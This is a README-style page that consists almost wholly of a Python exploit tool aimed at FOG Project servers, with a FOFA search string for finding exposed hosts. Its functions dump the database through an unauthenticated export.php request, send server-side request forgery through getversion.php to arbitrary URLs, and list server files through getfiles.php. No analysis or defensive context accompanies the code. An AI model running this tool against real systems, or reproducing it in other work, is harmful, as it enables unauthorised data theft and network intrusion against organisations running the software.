README.md
Rendering markdown...
import requests
import argparse
import sys
from urllib.parse import quote
# FOFA search icon_hash="-1952619005"
def print_cred():
print("[*] Fog project exploit by casp3r0x0 hassan al-khafaji")
print("[*] GitHub: https://github.com/casp3r0x0")
def EXPDump(target):
# Implementation for exploit dump functionality
print(f"[+] Target: {target}")
print("[+] Dumping...")
burp0_url = f"{target}/fog/management/export.php?filename=HistoryReport&type=pdf"
burp0_cookies = {"PHPSESSID": ""}
burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
burp0_data = {"fogguiuser": '', "fogguipass": '', "nojson": "4", "export": "3"}
x = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
x.raise_for_status()
with open("output.txt", "w", encoding="utf-8") as f:
f.write(x.text)
print("[+] Dumped saved to output.txt")
def SSRF(target, url):
# Implementation for SSRF functionality
print(f"[+] Target: {target}")
print(f"[+] SSRF URL: {url}")
burp0_url = f"{target}/fog/service/getversion.php?url={quote(url)}"
burp0_cookies = {"PHPSESSID": ""}
burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False)
res.raise_for_status()
print("[+] SSRF request sent")
def listfiles(target, path):
# Implementation for list files functionality
print(f"[+] Target: {target}")
print(f"[+] Path: {path}")
burp0_url = f"{target}/fog/status/getfiles.php?path={path}"
burp0_cookies = {"PHPSESSID": ""}
burp0_headers = {"X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.9", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36", "Origin": "http://192.168.43.133", "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}
res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False)
res.raise_for_status()
print("[+] List files request sent")
print(res.text)
def main():
parser = argparse.ArgumentParser(description="Exploit tool for FOGProject system by Casp3r0x0 Hassan Ali Al-khafaji")
parser.add_argument("-t", "--target", required=True, help="Target URL (mandatory)")
parser.add_argument("--dump", action="store_true", help="dump full db from the target")
parser.add_argument("--SSRF", metavar="URL", help="Execute SSRF function with specified URL")
parser.add_argument("--listfiles", metavar="PATH", help="Execute listfiles function with specified path")
args = parser.parse_args()
# Check if at least one action is specified
if not any([args.dump, args.SSRF, args.listfiles]):
print("Error: At least one action must be specified (--dump, --SSRF, or --listfiles)")
parser.print_help()
sys.exit(1)
target = args.target
if args.dump:
print_cred()
EXPDump(target)
if args.SSRF:
print_cred()
SSRF(target, args.SSRF)
if args.listfiles:
print_cred()
listfiles(target, args.listfiles)
if __name__ == "__main__":
main()